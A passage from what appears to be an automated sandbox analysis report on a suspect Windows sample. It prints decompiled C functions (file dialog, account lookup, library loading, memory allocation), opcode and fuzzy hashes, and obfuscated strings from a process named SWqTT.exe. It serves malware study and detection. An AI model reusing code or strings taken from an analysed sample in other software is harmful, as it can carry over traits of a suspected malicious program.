                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: _snwprintf
                                                                                      • String ID: %%-%d.%ds
                                                                                      • API String ID: 3988819677-2008345750
                                                                                      • Opcode ID: 8b20a529ff37d77b79effa085cf49c3b2d19e50ebfb67170c6dd6cfdd11deb7b
                                                                                      • Instruction ID: ecb877ded915dbad8d5af0e436ed4e240226c92ce5a1c47ab2288d53f8dcf9da
                                                                                      • Opcode Fuzzy Hash: 8b20a529ff37d77b79effa085cf49c3b2d19e50ebfb67170c6dd6cfdd11deb7b
                                                                                      • Instruction Fuzzy Hash: BC01B931600704AFD7109F69CC82D5A77ADFF48304B004439FD86B7292D635F911DBA5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0040507A, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 100%
                                                                                      			E0040507A(intOrPtr __eax, wchar_t* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v20;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v44;
				intOrPtr _v48;
				wchar_t* _v52;
				intOrPtr _v56;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v76;
				struct tagOFNA _v80;

				_v76 = __eax;
				_v68 = _a4;
				_v64 = 0;
				_v44 = 0;
				_v36 = 0;
				_v32 = _a8;
				_v20 = _a12;
				_v80 = 0x4c;
				_v56 = 1;
				_v52 = __esi;
				_v48 = 0x104;
				_v28 = 0x81804;
				if(GetOpenFileNameW( &_v80) == 0) {
					return 0;
				} else {
					wcscpy(__esi, _v52);
					return 1;
				}
			}















                                                                                      0x00405080
                                                                                      0x00405086
                                                                                      0x0040508b
                                                                                      0x0040508e
                                                                                      0x00405091
                                                                                      0x00405097
                                                                                      0x0040509d
                                                                                      0x004050a4
                                                                                      0x004050ab
                                                                                      0x004050b2
                                                                                      0x004050b5
                                                                                      0x004050bc
                                                                                      0x004050cb
                                                                                      0x004050e0
                                                                                      0x004050cd
                                                                                      0x004050d1
                                                                                      0x004050dc
                                                                                      0x004050dc

                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: FileNameOpenwcscpy
                                                                                      • String ID: L
                                                                                      • API String ID: 3246554996-2909332022
                                                                                      • Opcode ID: a51a7b57d6ecd1b98ae1f97c69f64cb7c1c2e9715c85319fb07a92e86122e8f3
                                                                                      • Instruction ID: bc55e530e402ba4b599a228f817f204aa1fc4279979982f23bca087f07049b97
                                                                                      • Opcode Fuzzy Hash: a51a7b57d6ecd1b98ae1f97c69f64cb7c1c2e9715c85319fb07a92e86122e8f3
                                                                                      • Instruction Fuzzy Hash: 9A015FB1D102199FDF40DFA9D885ADEBBF4BB08304F14812AE915F6240E77495458F98
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0040906D, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28libraryloaderCOMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 58%
                                                                                      			E0040906D(struct HINSTANCE__** __eax, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				void* __esi;
				_Unknown_base(*)()* _t10;
				void* _t12;
				struct HINSTANCE__** _t13;

				_t13 = __eax;
				_t12 = 0;
				if(E00408F72(__eax) != 0) {
					_t10 = GetProcAddress( *_t13, "LookupAccountSidW");
					if(_t10 != 0) {
						_t12 =  *_t10(0, _a4, _a8, _a12, _a16, _a20, _a24);
					}
				}
				return _t12;
			}







                                                                                      0x00409072
                                                                                      0x00409074
                                                                                      0x0040907d
                                                                                      0x00409086
                                                                                      0x0040908e
                                                                                      0x004090a5
                                                                                      0x004090a5
                                                                                      0x0040908e
                                                                                      0x004090ac

                                                                                      APIs
                                                                                      • GetProcAddress.KERNEL32(?,LookupAccountSidW), ref: 00409086
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: AddressProc
                                                                                      • String ID: LookupAccountSidW$Y@
                                                                                      • API String ID: 190572456-2352570548
                                                                                      • Opcode ID: ef5ceafcaa1143e80c32773d35785430279aa9a6fc3cb1ecefeef801cdbe6fb2
                                                                                      • Instruction ID: 3ebfd29b958db2e29df2983e37ea976ab6b1d16e8490ad6d4f073a9de280f7a1
                                                                                      • Opcode Fuzzy Hash: ef5ceafcaa1143e80c32773d35785430279aa9a6fc3cb1ecefeef801cdbe6fb2
                                                                                      • Instruction Fuzzy Hash: F5E0E537100109BBDF125E96DD01CAB7AA79F84750B144035FA54E1161D6368821A794
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0040AD85, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21libraryloaderCOMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 37%
                                                                                      			E0040AD85(intOrPtr _a4) {
				_Unknown_base(*)()* _t3;
				void* _t7;
				struct HINSTANCE__* _t8;
				char** _t9;

				_t7 = 0;
				_t8 = E00405436(L"shlwapi.dll");
				 *_t9 = "SHAutoComplete";
				_t3 = GetProcAddress(_t8, ??);
				if(_t3 != 0) {
					_t7 =  *_t3(_a4, 0x10000001);
				}
				FreeLibrary(_t8);
				return _t7;
			}







                                                                                      0x0040ad8c
                                                                                      0x0040ad93
                                                                                      0x0040ad95
                                                                                      0x0040ad9d
                                                                                      0x0040ada5
                                                                                      0x0040adb2
                                                                                      0x0040adb2
                                                                                      0x0040adb5
                                                                                      0x0040adbf

                                                                                      APIs
                                                                                        • Part of subcall function 00405436: memset.MSVCRT ref: 00405456
                                                                                        • Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
                                                                                        • Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                                        • Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                                      • GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 0040AD9D
                                                                                      • FreeLibrary.KERNEL32(00000000,?,00403CB8,00000000), ref: 0040ADB5
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: Library$Load$AddressFreeProcmemsetwcscat
                                                                                      • String ID: shlwapi.dll
                                                                                      • API String ID: 4092907564-3792422438
                                                                                      • Opcode ID: 60c0f151f26cb5c38cd65ac108f35652f4abbc6483df8549b5860e56d1e4938b
                                                                                      • Instruction ID: 3ba04cc2888c968bb17b12a51753cff707eeab9003a5d350ca2caef87bad7666
                                                                                      • Opcode Fuzzy Hash: 60c0f151f26cb5c38cd65ac108f35652f4abbc6483df8549b5860e56d1e4938b
                                                                                      • Instruction Fuzzy Hash: E1D01235211111EBD7616B66AD44A9F7AA6DFC1351B060036F544F2191DB3C4846C669
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00406597, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 100%
                                                                                      			E00406597(wchar_t* __esi) {
				wchar_t* _t2;
				wchar_t* _t6;

				_t6 = __esi;
				E00404AD9(__esi);
				_t2 = wcsrchr(__esi, 0x2e);
				if(_t2 != 0) {
					 *_t2 =  *_t2 & 0x00000000;
				}
				return wcscat(_t6, L"_lng.ini");
			}





                                                                                      0x00406597
                                                                                      0x00406598
                                                                                      0x004065a0
                                                                                      0x004065aa
                                                                                      0x004065ac
                                                                                      0x004065ac
                                                                                      0x004065bd

                                                                                      APIs
                                                                                        • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                                      • wcsrchr.MSVCRT ref: 004065A0
                                                                                      • wcscat.MSVCRT ref: 004065B6
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: FileModuleNamewcscatwcsrchr
                                                                                      • String ID: _lng.ini
                                                                                      • API String ID: 383090722-1948609170
                                                                                      • Opcode ID: 3432a58373c8f6497560b18ec501466e1d989437fee4d639b0ed4d8698fe302d
                                                                                      • Instruction ID: e4456dc4ef972d75cd366ed24565615e7e819105f92635e6590d4ece6e8d8120
                                                                                      • Opcode Fuzzy Hash: 3432a58373c8f6497560b18ec501466e1d989437fee4d639b0ed4d8698fe302d
                                                                                      • Instruction Fuzzy Hash: 16C01292682620A4E2223322AC03B4F1248CF62324F21407BF906381C7EFBD826180EE
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0040AC52, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 13libraryloaderCOMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 100%
                                                                                      			E0040AC52() {
				struct HINSTANCE__* _t1;
				_Unknown_base(*)()* _t2;

				if( *0x4101c4 == 0) {
					_t1 = E00405436(L"shell32.dll");
					 *0x4101c4 = _t1;
					if(_t1 != 0) {
						_t2 = GetProcAddress(_t1, "SHGetSpecialFolderPathW");
						 *0x4101c0 = _t2;
						return _t2;
					}
				}
				return _t1;
			}





                                                                                      0x0040ac59
                                                                                      0x0040ac60
                                                                                      0x0040ac68
                                                                                      0x0040ac6d
                                                                                      0x0040ac75
                                                                                      0x0040ac7b
                                                                                      0x00000000
                                                                                      0x0040ac7b
                                                                                      0x0040ac6d
                                                                                      0x0040ac80

                                                                                      APIs
                                                                                        • Part of subcall function 00405436: memset.MSVCRT ref: 00405456
                                                                                        • Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
                                                                                        • Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                                        • Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                                      • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 0040AC75
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: LibraryLoad$AddressProcmemsetwcscat
                                                                                      • String ID: SHGetSpecialFolderPathW$shell32.dll
                                                                                      • API String ID: 946536540-880857682
                                                                                      • Opcode ID: c6b2f9cbd74a5c44be84662768ba9687afe1719f9bd5d931826811f56c49482b
                                                                                      • Instruction ID: 297d67d15b42b64e279660486abf15c243c4c6a8dcafd005a32ae5f28444c9d4
                                                                                      • Opcode Fuzzy Hash: c6b2f9cbd74a5c44be84662768ba9687afe1719f9bd5d931826811f56c49482b
                                                                                      • Instruction Fuzzy Hash: 9AD0C9B0D8A301ABE7106BB0AF05B523AA4B704301F12417BF800B12E0DBBE90888A1E
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00406670, Relevance: 5.1, APIs: 4, Instructions: 73COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 90%
                                                                                      			E00406670(char** __esi, void* __eflags) {
				char* _t30;
				char** _t39;

				_t39 = __esi;
				 *__esi = "cf@";
				__esi[0xb8] = 0;
				_t30 = E00404FA4(0x338, __esi);
				_push(0x14);
				__esi[0xcb] = 0;
				__esi[0xa6] = 0;
				__esi[0xb9] = 0;
				__esi[0xba] = 0xfff;
				__esi[8] = 0;
				__esi[1] = 0;
				__esi[0xb7] = 1;
				L0040B26C();
				if(_t30 == 0) {
					_t30 = 0;
				} else {
					_t30[4] = 0;
					_t30[0x10] = 0;
					_t30[8] = 0;
					_t30[0xc] = 0x100;
					 *_t30 = 0;
				}
				_push(0x14);
				_t39[2] = _t30;
				L0040B26C();
				if(_t30 == 0) {
					_t30 = 0;
				} else {
					_t30[4] = 0;
					_t30[0x10] = 0;
					_t30[8] = 0;
					_t30[0xc] = 0x100;
					 *_t30 = 0;
				}
				_push(0x14);
				_t39[3] = _t30;
				L0040B26C();
				if(_t30 == 0) {
					_t30 = 0;
				} else {
					_t30[4] = 0;
					_t30[0x10] = 0;
					_t30[8] = 0;
					_t30[0xc] = 0x100;
					 *_t30 = 0;
				}
				_push(0x14);
				_t39[4] = _t30;
				L0040B26C();
				if(_t30 == 0) {
					_t30 = 0;
				} else {
					_t30[4] = 0;
					_t30[0x10] = 0;
					_t30[8] = 0;
					_t30[0xc] = 0x100;
					 *_t30 = 0;
				}
				_t39[5] = _t30;
				return _t39;
			}





                                                                                      0x00406670
                                                                                      0x0040667a
                                                                                      0x00406680
                                                                                      0x00406686
                                                                                      0x0040668b
                                                                                      0x0040668d
                                                                                      0x00406693
                                                                                      0x00406699
                                                                                      0x0040669f
                                                                                      0x004066a9
                                                                                      0x004066ac
                                                                                      0x004066af
                                                                                      0x004066b9
                                                                                      0x004066c7
                                                                                      0x004066d9
                                                                                      0x004066c9
                                                                                      0x004066c9
                                                                                      0x004066cc
                                                                                      0x004066cf
                                                                                      0x004066d2
                                                                                      0x004066d5
                                                                                      0x004066d5
                                                                                      0x004066db
                                                                                      0x004066dd
                                                                                      0x004066e0
                                                                                      0x004066e8
                                                                                      0x004066fa
                                                                                      0x004066ea
                                                                                      0x004066ea
                                                                                      0x004066ed
                                                                                      0x004066f0
                                                                                      0x004066f3
                                                                                      0x004066f6
                                                                                      0x004066f6
                                                                                      0x004066fc
                                                                                      0x004066fe
                                                                                      0x00406701
                                                                                      0x00406709
                                                                                      0x0040671b
                                                                                      0x0040670b
                                                                                      0x0040670b
                                                                                      0x0040670e
                                                                                      0x00406711
                                                                                      0x00406714
                                                                                      0x00406717
                                                                                      0x00406717
                                                                                      0x0040671d
                                                                                      0x0040671f
                                                                                      0x00406722
                                                                                      0x0040672a
                                                                                      0x0040673c
                                                                                      0x0040672c
                                                                                      0x0040672c
                                                                                      0x0040672f
                                                                                      0x00406732
                                                                                      0x00406735
                                                                                      0x00406738
                                                                                      0x00406738
                                                                                      0x0040673f
                                                                                      0x00406745

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: ??2@$memset
                                                                                      • String ID:
                                                                                      • API String ID: 1860491036-0
                                                                                      • Opcode ID: e85a19cc904d935af36f35088f158f19d60a259a6de7382aef0aa8ca398aac1e
                                                                                      • Instruction ID: f950f85206354bd8a0b3bb5dce35e971dba3beadb745d31d99e8bf3535aee89b
                                                                                      • Opcode Fuzzy Hash: e85a19cc904d935af36f35088f158f19d60a259a6de7382aef0aa8ca398aac1e
                                                                                      • Instruction Fuzzy Hash: F121D4B0A007008FD7219F2AC448956FBE8FF90314B2689BFD15ADB2B1D7B89441DF18
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 004054DF, Relevance: 5.1, APIs: 4, Instructions: 67COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 100%
                                                                                      			E004054DF(signed int* __eax, void* __ecx, wchar_t* _a4) {
				int _v8;
				signed int _v12;
				void* __edi;
				int _t32;
				intOrPtr _t33;
				intOrPtr _t36;
				signed int _t48;
				signed int _t58;
				signed int _t59;
				void** _t62;
				void** _t63;
				signed int* _t66;

				_t66 = __eax;
				_t32 = wcslen(_a4);
				_t48 =  *(_t66 + 4);
				_t58 = _t48 + _t32;
				_v12 = _t58;
				_t59 = _t58 + 1;
				_v8 = _t32;
				_t33 =  *((intOrPtr*)(_t66 + 0x14));
				 *(_t66 + 4) = _t59;
				_t62 = _t66 + 0x10;
				if(_t59 != 0xffffffff) {
					E00404951(_t66, _t59, _t62, 2, _t33);
				} else {
					free( *_t62);
				}
				_t60 =  *(_t66 + 0x1c);
				_t36 =  *((intOrPtr*)(_t66 + 0x18));
				_t63 = _t66 + 0xc;
				if( *(_t66 + 0x1c) != 0xffffffff) {
					E00404951(_t66 + 8, _t60, _t63, 4, _t36);
				} else {
					free( *_t63);
				}
				memcpy( *(_t66 + 0x10) + _t48 * 2, _a4, _v8 + _v8);
				 *((short*)( *(_t66 + 0x10) + _v12 * 2)) =  *( *(_t66 + 0x10) + _v12 * 2) & 0x00000000;
				 *( *_t63 +  *(_t66 + 0x1c) * 4) = _t48;
				 *(_t66 + 0x1c) =  *(_t66 + 0x1c) + 1;
				_t30 =  *(_t66 + 0x1c) - 1; // -1
				return _t30;
			}















                                                                                      0x004054ea
                                                                                      0x004054ec
                                                                                      0x004054f1
                                                                                      0x004054f4
                                                                                      0x004054f7
                                                                                      0x004054fa
                                                                                      0x004054fe
                                                                                      0x00405501
                                                                                      0x00405505
                                                                                      0x00405508
                                                                                      0x0040550b
                                                                                      0x0040551b
                                                                                      0x0040550d
                                                                                      0x0040550f
                                                                                      0x0040550f
                                                                                      0x00405521
                                                                                      0x00405527
                                                                                      0x0040552b
                                                                                      0x0040552e
                                                                                      0x0040553f
                                                                                      0x00405530
                                                                                      0x00405532
                                                                                      0x00405532
                                                                                      0x00405556
                                                                                      0x00405561
                                                                                      0x0040556e
                                                                                      0x00405571
                                                                                      0x00405578
                                                                                      0x0040557e

                                                                                      APIs
                                                                                      • wcslen.MSVCRT ref: 004054EC
                                                                                      • free.MSVCRT(?,00000001,?,00000000,?,?,?,00405830,?,00000000,?,00000000), ref: 0040550F
                                                                                        • Part of subcall function 00404951: malloc.MSVCRT ref: 0040496D
                                                                                        • Part of subcall function 00404951: memcpy.MSVCRT ref: 00404985
                                                                                        • Part of subcall function 00404951: free.MSVCRT(00000000,00000000,?,004055BF,00000002,?,00000000,?,004057E1,00000000,?,00000000), ref: 0040498E
                                                                                      • free.MSVCRT(?,00000001,?,00000000,?,?,?,00405830,?,00000000,?,00000000), ref: 00405532
                                                                                      • memcpy.MSVCRT ref: 00405556
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: free$memcpy$mallocwcslen
                                                                                      • String ID:
                                                                                      • API String ID: 726966127-0
                                                                                      • Opcode ID: 5c7b7bb3817ea86daae365c80c5e036228049141d00745b32d160c1d254800f2
                                                                                      • Instruction ID: a1978c74b5bce8e8bf6bff77aa8c6c4d26791a9d8288a70caf523018dd8727ee
                                                                                      • Opcode Fuzzy Hash: 5c7b7bb3817ea86daae365c80c5e036228049141d00745b32d160c1d254800f2
                                                                                      • Instruction Fuzzy Hash: 14216FB1500704EFC720DF68D881C9BB7F5EF483247208A6EF456A7691D735B9158B98
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00405ADF, Relevance: 5.1, APIs: 4, Instructions: 51COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 81%
                                                                                      			E00405ADF() {
				void* _t25;
				signed int _t27;
				signed int _t29;
				signed int _t31;
				signed int _t33;
				signed int _t50;
				signed int _t52;
				signed int _t54;
				signed int _t56;
				intOrPtr _t60;

				_t60 =  *0x41c470;
				if(_t60 == 0) {
					_t50 = 2;
					 *0x41c470 = 0x8000;
					_t27 = 0x8000 * _t50;
					 *0x41c474 = 0x100;
					 *0x41c478 = 0x1000;
					_push( ~(0 | _t60 > 0x00000000) | _t27);
					L0040B26C();
					 *0x41c458 = _t27;
					_t52 = 4;
					_t29 =  *0x41c474 * _t52;
					_push( ~(0 | _t60 > 0x00000000) | _t29);
					L0040B26C();
					 *0x41c460 = _t29;
					_t54 = 4;
					_t31 =  *0x41c474 * _t54;
					_push( ~(0 | _t60 > 0x00000000) | _t31);
					L0040B26C();
					 *0x41c464 = _t31;
					_t56 = 2;
					_t33 =  *0x41c478 * _t56;
					_push( ~(0 | _t60 > 0x00000000) | _t33);
					L0040B26C();
					 *0x41c45c = _t33;
					return _t33;
				}
				return _t25;
			}













                                                                                      0x00405adf
                                                                                      0x00405ae6
                                                                                      0x00405af5
                                                                                      0x00405af6
                                                                                      0x00405afb
                                                                                      0x00405b00
                                                                                      0x00405b0a
                                                                                      0x00405b18
                                                                                      0x00405b19
                                                                                      0x00405b1e
                                                                                      0x00405b2c
                                                                                      0x00405b2d
                                                                                      0x00405b36
                                                                                      0x00405b37
                                                                                      0x00405b3c
                                                                                      0x00405b4a
                                                                                      0x00405b4b
                                                                                      0x00405b54
                                                                                      0x00405b55
                                                                                      0x00405b5a
                                                                                      0x00405b68
                                                                                      0x00405b69
                                                                                      0x00405b72
                                                                                      0x00405b73
                                                                                      0x00405b7b
                                                                                      0x00000000
                                                                                      0x00405b7b
                                                                                      0x00405b80

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: ??2@
                                                                                      • String ID:
                                                                                      • API String ID: 1033339047-0
                                                                                      • Opcode ID: fe94db315f44a6ad13eaa6f5e90a6aac049872e3421695f41c948c22f86c7b92
                                                                                      • Instruction ID: f2da1691ca32ceef4ebb7ffb039160a3052a1a0853e807cf512b268ff05fa3b0
                                                                                      • Opcode Fuzzy Hash: fe94db315f44a6ad13eaa6f5e90a6aac049872e3421695f41c948c22f86c7b92
                                                                                      • Instruction Fuzzy Hash: 850121B12C63005EE758DB38EDAB77A36A4E748754F00913EA146CE1F5EB7454408E4C
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Analysis Process: SWqTT.exe PID: 3064 Parent PID: 3388 SWqTT.exeCOMMON

                                                                                      Executed Functions

                                                                                      Function 010DA970, Relevance: 5.8, Strings: 3, Instructions: 2084COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000020.00000002.469340657.00000000010D0000.00000040.00000001.sdmp, Offset: 010D0000, based on PE: false
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: "3"saCtriP "" ttwdi/"a.st}{ mnlFX/$"saCtriP "" ttwdi/"a.st}{ mnlFX/$saCtriP "" ttwdi/"a.st}{ mnlFX/
                                                                                      • API String ID: 0-1166855168
                                                                                      • Opcode ID: ec565017859d1ac95f052bb177ddf24f809d69adbe575d99732cd01da2111c6b
                                                                                      • Instruction ID: b321373b0709f1f9c287143b9755ecb2e5e7aee37c5632cfb903e17e48249033
                                                                                      • Opcode Fuzzy Hash: ec565017859d1ac95f052bb177ddf24f809d69adbe575d99732cd01da2111c6b
                                                                                      • Instruction Fuzzy Hash: 6703B214E2530089C7B58F8483D8A6D27E2AF85344F16D6DBE0941F6F6FBB18998C74B
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 010DA96B, Relevance: 5.8, Strings: 3, Instructions: 2071COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000020.00000002.469340657.00000000010D0000.00000040.00000001.sdmp, Offset: 010D0000, based on PE: false
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: "3"saCtriP "" ttwdi/"a.st}{ mnlFX/$"saCtriP "" ttwdi/"a.st}{ mnlFX/$saCtriP "" ttwdi/"a.st}{ mnlFX/
                                                                                      • API String ID: 0-1166855168
                                                                                      • Opcode ID: e0efc4dc2605b1852fd0f1a75a3605a762c5cecec711b02d1b515942ea503958
                                                                                      • Instruction ID: f5c18e6949dcf25e64b754d6a87b30020d6b3fe211ea7b76c37e58e68e4307df
                                                                                      • Opcode Fuzzy Hash: e0efc4dc2605b1852fd0f1a75a3605a762c5cecec711b02d1b515942ea503958
                                                                                      • Instruction Fuzzy Hash: 9E03B214E2530089C7B58F8483D8A6D27E2AF85344F16D6DBE0941F6F6FBB18998C74B
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 010D22D0, Relevance: .5, Instructions: 487COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000020.00000002.469340657.00000000010D0000.00000040.00000001.sdmp, Offset: 010D0000, based on PE: false
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 49d4d775e9e0a43fa511d13c0adace4aeeec907f29e08d358e3686978311933a
                                                                                      • Instruction ID: 9862545d66870ccaeb04334b514808b6c4ec270004d5e9d2fac780a192792dad
                                                                                      • Opcode Fuzzy Hash: 49d4d775e9e0a43fa511d13c0adace4aeeec907f29e08d358e3686978311933a
                                                                                      • Instruction Fuzzy Hash: A102AE70A002198FDB14DF68C894BAEBBF6AF88304F158169E945EB395DF34DD46CB90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 010D28B8, Relevance: .4, Instructions: 448COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000020.00000002.469340657.00000000010D0000.00000040.00000001.sdmp, Offset: 010D0000, based on PE: false
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: bf2856d0bf227dc2fe2545a81ce960d446bad2f22c4188aaabc09a422fbf300b
                                                                                      • Instruction ID: 3132ee703653d2e46c702a7749a53634d7c52b9f5bde1d5b06644482043d4484
                                                                                      • Opcode Fuzzy Hash: bf2856d0bf227dc2fe2545a81ce960d446bad2f22c4188aaabc09a422fbf300b
                                                                                      • Instruction Fuzzy Hash: 0C028F30A00219CFCB55DFA8C984AADBBF2FF89340F1580A9E995EB261D730EC41CB51
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 010D0848, Relevance: 7.6, Strings: 6, Instructions: 95COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000020.00000002.469340657.00000000010D0000.00000040.00000001.sdmp, Offset: 010D0000, based on PE: false
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Pt$Pt$Pt$Pt$py$py
